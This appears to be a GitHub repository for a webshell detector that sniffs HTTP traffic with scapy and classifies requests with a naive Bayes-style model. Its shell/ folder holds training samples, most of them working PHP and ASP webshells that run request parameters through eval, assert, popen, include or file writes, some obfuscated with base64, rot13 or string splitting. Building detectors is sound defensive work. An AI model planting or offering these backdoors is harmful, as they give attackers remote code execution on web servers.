├── README.md
├── image
    ├── 测试告警.png
    └── 测试正常.png
├── listen_traffic.py
├── machine_learning_model.py
├── main.py
├── requirements.txt
└── shell
    ├── normal-asp-code-0.asp
    ├── normal-jsp-code-0.jsp
    ├── normal-php-code-0.php
    ├── normal-php-code-1.php
    ├── normal-php-code-2.php
    ├── normal-php-code-3.php
    ├── shell-asp-eval-0.asp
    ├── shell-php-assert-0.php
    ├── shell-php-assert-1.php
    ├── shell-php-assert-2.php
    ├── shell-php-assert-3.php
    ├── shell-php-assert-4.php
    ├── shell-php-call_user_func-0.php
    ├── shell-php-copy-0.php
    ├── shell-php-create_function-0.php
    ├── shell-php-create_function-1.php
    ├── shell-php-create_function-2.php
    ├── shell-php-create_function-3.php
    ├── shell-php-eval-2.php
    ├── shell-php-eval-3.php
    ├── shell-php-eval-4.php
    ├── shell-php-eval-5.php
    ├── shell-php-eval-6.php
    ├── shell-php-fwrite-0.php
    ├── shell-php-include-0.php
    ├── shell-php-include-1.php
    ├── shell-php-include-5.php
    ├── shell-php-popen-0.php
    ├── shell-php-preg_replace-0.php
    ├── shell-php-preg_replace-1.php
    ├── shell-php-preg_replace-2.php
    ├── shell-php-require-0.php
    └── shell-php-require-4.php


/README.md:
--------------------------------------------------------------------------------
 1 | # Machine-Learning-Bayesian-Algorithm-Packet-Inspection-webshell-discover
 2 | 基于包检测和贝叶斯算法的webshell检查程序<br>
 3 | <br>
 4 | 主文件:main.py<br>
 5 | port_name 指定网卡名称<br>
 6 | port_filter 按照语法设置过滤条件<br>
 7 | <br>
 8 | 拆包器:listen_traffic.py<br>
 9 | 主要用于拆包，提取HTTP请求中的特征。<br>
10 | <br>
11 | 算法文件：machine_learning_model.py<br>
12 | 使用贝叶斯算法，对于shell学习。<br>
13 | <br>
14 | webshell文件夹:shell<br>
15 | 这里面是webshell文件,命名规则是 <normal\shell>-<文件类型>-<特征>-<文件编号>-<文件后缀>，例如:normal-php-code-3.php<br>
16 | 
17 | <br>
18 | 备注:不支持from-data检测。<br>
19 | 
20 | <br>
21 | 测试情况<br>
22 | 告警信息:<br>
23 | 
24 | ![image](https://github.com/SkyBlueEternal/Machine-Learning-Bayesian-Algorithm-Packet-Inspection-webshell-discover/blob/master/image/%E6%B5%8B%E8%AF%95%E5%91%8A%E8%AD%A6.png?raw=true)
25 | 
26 | ![image](https://github.com/SkyBlueEternal/Machine-Learning-Bayesian-Algorithm-Packet-Inspection-webshell-discover/blob/master/image/%E6%B5%8B%E8%AF%95%E6%AD%A3%E5%B8%B8.png?raw=true)
27 | 


--------------------------------------------------------------------------------
/image/测试告警.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SkyBlueEternal/Machine-Learning-Bayesian-Algorithm-Packet-Inspection-webshell-discover/c5c36afeccbf4e2b266ded14c9dddaf8a4668f15/image/测试告警.png


--------------------------------------------------------------------------------
/image/测试正常.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SkyBlueEternal/Machine-Learning-Bayesian-Algorithm-Packet-Inspection-webshell-discover/c5c36afeccbf4e2b266ded14c9dddaf8a4668f15/image/测试正常.png


--------------------------------------------------------------------------------
/listen_traffic.py:
--------------------------------------------------------------------------------
 1 | # coding = utf-8
 2 | from urllib.parse import unquote
 3 | from scapy.all import *
 4 | try:
 5 |     # This import works from the project directory
 6 |     import scapy_http.http
 7 | except ImportError:
 8 |     # If you installed this package via pip, you just need to execute this
 9 |     from scapy.layers import http
10 | import machine_learning_model
11 | 
12 | 
13 | class ListenTraffic():
14 |     def __init__(self):  # 检测到通过第一个数据包的时候加载算法
15 |         self.model = machine_learning_model.shell_detect()
16 |         if isinstance(self.model,machine_learning_model.shell_detect): #machine_learning_model.shell_detect
17 |             print(u"贝叶斯算法加载完成，引擎启动")
18 |         else:
19 |             print(u"贝叶斯算法加载失败。")
20 | 
21 |     def __result__(self, packet):  # POST 和GET 请求分别处理
22 |         self.http_request = packet
23 |         try:
24 |             self.Method = self.http_request["HTTPRequest"].Method
25 |         except:
26 |             pass
27 |         else:
28 |             if self.Method in b"POST":
29 |                 http_request = unquote(str(self.http_request["Raw"].load), 'utf-8')
30 |                 self.model.try_classify(unquote(http_request, 'utf-8'))
31 |             elif self.Method in b"GET":
32 |                 http_request = self.http_request["HTTPRequest"].Path
33 |                 http_request = unquote(str(http_request),'utf-8')
34 |                 self.model.try_classify(unquote(http_request,'utf-8'))
35 | 
36 |     def __flow_separa__(self, packet):  # 区分POST 和GET
37 |         if "POST" in str(packet):
38 |             return packet
39 |             # return packet
40 |         elif "GET" in str(packet):
41 |             return packet
42 |             # return packet
43 |         else:pass
44 | 
45 |     def run(self, port_name, port_filter):  # 运行监听
46 |         sniff(
47 |             iface=port_name,
48 |             prn=self.__result__,
49 |             lfilter=lambda p: self.__flow_separa__(p),
50 |             filter=port_filter   # 设置端口为 tcp port 80 和8080
51 |         )
52 | 


--------------------------------------------------------------------------------
/machine_learning_model.py:
--------------------------------------------------------------------------------
  1 | 
  2 | import math
  3 | import os
  4 | import sys
  5 | 
  6 | 
  7 | class shell_detect :
  8 |     
  9 |     @staticmethod
 10 |     def read_file(file_path) :
 11 |         file = open(file_path)
 12 |         data = file.read()
 13 | 
 14 |         file.close()
 15 | 
 16 |         return data
 17 | 
 18 |     @staticmethod
 19 |     def code_word_to_vector(php_code) :
 20 |         filter_flag_list = ['@','[',']','(',')','{','}','\'','"',',',';','=','.','\t','\n','\r\n']
 21 |         keyword = ['$_GET','$_POST','$_REQUEST','$_COOKIE']
 22 | 
 23 |         for filter_flag_index in filter_flag_list :
 24 |             php_code = php_code.replace(filter_flag_index,' ')
 25 | 
 26 |         vector = php_code.split(' ')
 27 | 
 28 |         for index in range(len(vector)) :  #  filter $ variant
 29 |             if vector[index].startswith('$') and not vector[index] in keyword :
 30 |                 vector[index] = ''
 31 |             elif vector[index] in keyword :
 32 |                 vector[index] = '$'
 33 | 
 34 |         while vector.count('') :  #  filter empty item ..
 35 |             vector.remove('')
 36 | 
 37 |         return vector
 38 | 
 39 |     @staticmethod
 40 |     def load_and_train_model(data_set_path = './shell') :
 41 |         file_list = os.listdir(data_set_path)
 42 |         shell_sample = {}          #  classfy set ..
 43 | 
 44 |         for file_index in file_list :
 45 |             try :
 46 |                 file_information = file_index.split('-')
 47 |                 classfy_type = file_information[0] + '-' + file_information[1] + '-' + file_information[2]
 48 |                 php_code_vector = shell_detect.code_word_to_vector(shell_detect.read_file(data_set_path + '\\' + file_index))
 49 | 
 50 |                 if classfy_type not in shell_sample :
 51 |                     shell_sample[classfy_type] = []
 52 | 
 53 |                 shell_sample[classfy_type].append(php_code_vector)
 54 |             except Exception as e:
 55 |                 print(e)
 56 | 
 57 | 
 58 |         return shell_sample
 59 |     
 60 |     def __init__(self,data_set_path = './shell') :
 61 |         self.shell_sample = shell_detect.load_and_train_model(data_set_path)
 62 |     
 63 |     def try_classify(self,php_code) :
 64 |         php_code_vector = shell_detect.code_word_to_vector(php_code.replace("\n",""))
 65 |         alpha = 1
 66 |         p_list = {}
 67 | 
 68 |         #print 'Debug for try_classify : ' ,php_code_vector
 69 | 
 70 |         for key_index in self.shell_sample.keys() :
 71 |             max_p_value = 0
 72 | 
 73 |             for shell_sample_index in self.shell_sample[key_index] :
 74 |                 found_vector_in_shell_sample_count = 0
 75 | 
 76 |                 for php_code_vector_index in php_code_vector :
 77 |                     if php_code_vector_index in shell_sample_index :
 78 |                         found_vector_in_shell_sample_count += shell_sample_index.count(php_code_vector_index)
 79 | 
 80 |                 p_value = (found_vector_in_shell_sample_count + alpha) / float(len(shell_sample_index) * 2 + alpha)
 81 | 
 82 |                 #print shell_sample_index , p_value
 83 | 
 84 |                 if p_value >= max_p_value :
 85 |                     max_p_value = p_value
 86 | 
 87 |             p_list[key_index] = max_p_value
 88 | 
 89 |             #print key_index ,p_list[key_index]
 90 | 
 91 |         max_p_value = 0
 92 |         max_p_type_name = ''
 93 | 
 94 |         for p_type_name_index in p_list.keys() :
 95 |             p_value = p_list[p_type_name_index]
 96 | 
 97 |             if p_value >= max_p_value :
 98 |                 max_p_value = p_value
 99 |                 max_p_type_name = p_type_name_index
100 | 
101 |         #print php_code , max_p_type_name , max_p_value
102 |         print("*" * 30)
103 |         print("HTTP_REQUEST:\n", php_code, '\nShell Type :\n', max_p_type_name)
104 |         print("*" * 30,"\n")
105 |         return max_p_type_name
106 | 
107 |     
108 | # if __name__ == '__main__' :
109 | #     model = shell_detect()
110 | #
111 | #     if 2 == len(sys.argv) :
112 | #         print('Shell Type :' , model.try_classify(shell_detect.read_file(sys.argv[1])))
113 | #     else :
114 | #         print('Test Sample ..')
115 | #         print('Shell Type :' , model.try_classify('<?php eval($_GET["exp"]); ?>'))
116 | #         print('Shell Type :' , model.try_classify('<?php assert($_GET["exp"]); ?>'))
117 | #         print('Shell Type :' , model.try_classify('<?php system($_GET["exp"]); ?>'))
118 | #         print('Shell Type :' , model.try_classify('<?php systen("ifconfig"); ?>'))
119 | #         print('Shell Type :' , model.try_classify('<?php echo "123"; ?>'))
120 | #         print('Shell Type :' , model.try_classify('<?php $b=1+1; ?>'))
121 | #         print('Shell Type :' , model.try_classify('<?php phpinfo(); ?>'))
122 | #         print('Shell Type :' , model.try_classify('<?php $a=create_function(\'\',\'ev\',\'al\'.\'($\'.\'_GET["e"]);\'); $a(); ?>'))
123 | #         print('Shell Type :' , model.try_classify('<?php include($_COOKIE[\'s\']); ?>'))
124 | #         print('Shell Type :' , model.try_classify('<?php require_once($_POST[\'s\']); ?>'))
125 | 


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
 1 | # coding =utf-8
 2 | # 程序作者:vr_system
 3 | # 程序版本:v 1.0
 4 | 
 5 | import listen_traffic
 6 | 
 7 | if __name__ == '__main__':
 8 |     port_name = "VirtualBox Host-Only Ethernet Adapter"
 9 |     port_filter = "tcp port 80 8080"
10 |     listen_traffic.ListenTraffic().run(port_name=port_name, port_filter=port_filter)
11 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | scapy==2.4.3
2 | 


--------------------------------------------------------------------------------
/shell/normal-asp-code-0.asp:
--------------------------------------------------------------------------------
1 | 
2 | <%
3 |    
4 |    dim $a
5 |    
6 |    $a = 0
7 |    
8 | %>


--------------------------------------------------------------------------------
/shell/normal-jsp-code-0.jsp:
--------------------------------------------------------------------------------
1 | 
2 | <%
3 |    
4 |    int $i = 0;
5 |    
6 | %>
7 | 


--------------------------------------------------------------------------------
/shell/normal-php-code-0.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php
3 | 
4 |     echo '123';
5 | 
6 | ?>
7 | 


--------------------------------------------------------------------------------
/shell/normal-php-code-1.php:
--------------------------------------------------------------------------------
 1 | 
 2 | <?php
 3 | 
 4 |     $test=0;
 5 |     $b=$test+1;
 6 | 
 7 |     echo $b;
 8 | 
 9 | ?>
10 | 


--------------------------------------------------------------------------------
/shell/normal-php-code-2.php:
--------------------------------------------------------------------------------
 1 | 
 2 | <?php
 3 | 
 4 |     $sum = 0;
 5 | 
 6 |     for ($index = 1;$index < 10 ;$index++)
 7 |         $sum += $index;
 8 | 
 9 | ?>
10 | 


--------------------------------------------------------------------------------
/shell/normal-php-code-3.php:
--------------------------------------------------------------------------------
 1 | 
 2 | <?php
 3 | 
 4 |     if ('123' == '321')
 5 |         $asd = 1;
 6 |     else if ('123' == '123')
 7 |         $asd = 2;
 8 |     else
 9 |         $asd = 3;
10 | 
11 | ?>
12 | 


--------------------------------------------------------------------------------
/shell/shell-asp-eval-0.asp:
--------------------------------------------------------------------------------
1 | <% eval request("chopper") %>


--------------------------------------------------------------------------------
/shell/shell-php-assert-0.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 |     assert('$code=function() {'.$_REQUEST['code'].'}');
4 |     $code();
5 | ?>
6 | 


--------------------------------------------------------------------------------
/shell/shell-php-assert-1.php:
--------------------------------------------------------------------------------
1 | <?php array_map("ass\x65rt",(array)$_REQUEST['expdoor']);?>


--------------------------------------------------------------------------------
/shell/shell-php-assert-2.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 |     assert($_GET['code']);
4 | ?>
5 | 


--------------------------------------------------------------------------------
/shell/shell-php-assert-3.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 |     assert($_REQUEST['code']);
4 | ?>
5 | 


--------------------------------------------------------------------------------
/shell/shell-php-assert-4.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 | 
4 |     $item['wind'] = 'assert';
5 |     $array[] = $item;
6 |     $array[0]['wind']($_POST['hkwwj']);
7 | 
8 | ?>
9 | 


--------------------------------------------------------------------------------
/shell/shell-php-call_user_func-0.php:
--------------------------------------------------------------------------------
1 | <?php call_user_func(create_function(null,'assert($_POST[c]);')); ?>


--------------------------------------------------------------------------------
/shell/shell-php-copy-0.php:
--------------------------------------------------------------------------------
 1 | 
 2 | <?php
 3 |     if($_GET["hackers"]=="2b"){
 4 |         if ($_SERVER['REQUEST_METHOD'] == 'POST') {
 5 |             if(!file_exists($_FILES["upfile"]["name"])) {
 6 |                 copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]);
 7 |             }
 8 |         }
 9 |     }
10 | ?>
11 | 


--------------------------------------------------------------------------------
/shell/shell-php-create_function-0.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php
3 | 
4 |     $function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');
5 | 
6 |     $function();
7 | 
8 | ?>
9 | 


--------------------------------------------------------------------------------
/shell/shell-php-create_function-1.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php
3 | 
4 |     $function = create_function('$code','ev'.'al'.'($_'.'GET'.'["code"]);');
5 | 
6 |     $function();
7 | 
8 | ?>
9 | 


--------------------------------------------------------------------------------
/shell/shell-php-create_function-2.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php
3 | 
4 |     $function = create_function('$code',base64_decode('ZXZhbCgkX0dFVFsidGVzdCJdKTs='));
5 | 
6 |     $function();
7 | 
8 | ?>
9 | 


--------------------------------------------------------------------------------
/shell/shell-php-create_function-3.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php
3 | 
4 |     $function = create_function('$code','eval($_GET["asd"]);');
5 | 
6 |     $function();
7 | 
8 | ?>
9 | 


--------------------------------------------------------------------------------
/shell/shell-php-eval-2.php:
--------------------------------------------------------------------------------
1 | <?
2 |     $code = '';
3 |     foreach($_POST as $a){
4 |         $code = $a;
5 |         break;
6 |     }
7 |     eval($code);
8 | ?>


--------------------------------------------------------------------------------
/shell/shell-php-eval-3.php:
--------------------------------------------------------------------------------
1 | <?php $s=@$_GET[2];if(md5($s.$s)=="e67c2597ecad64bb4cdad6633b04107f")@eval($_REQUEST[$s]); ?>


--------------------------------------------------------------------------------
/shell/shell-php-eval-4.php:
--------------------------------------------------------------------------------
1 | <?php eval(str_rot13('riny($_CBFG[cntr]);')); ?>


--------------------------------------------------------------------------------
/shell/shell-php-eval-5.php:
--------------------------------------------------------------------------------
1 | <?php 
2 | $a = $_POST['n985de9'];
3 | if(isset($a)) {
4 |     eval(base64_decode($a));
5 | }
6 | ?>


--------------------------------------------------------------------------------
/shell/shell-php-eval-6.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 |     eval(gzuncompress(base64_decode("")));
4 | 
5 | ?>
6 | 


--------------------------------------------------------------------------------
/shell/shell-php-fwrite-0.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 |     if ($_POST) {
4 |         $f = fopen($_POST["f"],"w");
5 |         
6 |         fwrite($f,$_POST["c"]);
7 |     }
8 | 
9 | ?>


--------------------------------------------------------------------------------
/shell/shell-php-include-0.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php
3 | 
4 |     $file = file_put_contents('code.php','<?php '.$_REQUEST['code'].' ?>');
5 | 
6 |     include 'code.php';
7 | 
8 | ?>
9 | 


--------------------------------------------------------------------------------
/shell/shell-php-include-1.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 | 
4 |     include($_GET[123]);
5 | 
6 | ?>
7 | 
8 | 


--------------------------------------------------------------------------------
/shell/shell-php-include-5.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 | 
4 |     include_once($_GET[123]);
5 | 
6 | ?>
7 | 
8 | 


--------------------------------------------------------------------------------
/shell/shell-php-popen-0.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php
3 | 
4 |     $handle = popen($_REQUEST['code'],'r');
5 | 
6 |     echo fread($handle,1024*4);
7 | 
8 | ?>
9 | 


--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-0.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 | 
4 |     preg_replace('/a/e','eval($_GET["code"]);','a');
5 | 
6 | ?>
7 | 


--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-1.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 |     $page = $_POST['page'];
4 |     preg_replace("/[errorpage]/e",$page,"saft");
5 | 
6 | ?>


--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-2.php:
--------------------------------------------------------------------------------
1 | <?
2 | 
3 |     @preg_replace("/f/e",$_GET['u'],"fengjiao"); 
4 | 
5 | ?>


--------------------------------------------------------------------------------
/shell/shell-php-require-0.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 | 
4 |     require $_REQUEST['test'];
5 | 
6 | ?>
7 | 
8 | 


--------------------------------------------------------------------------------
/shell/shell-php-require-4.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php 
3 | 
4 |     require_once $_REQUEST['test'];
5 | 
6 | ?>
7 | 
8 | 


--------------------------------------------------------------------------------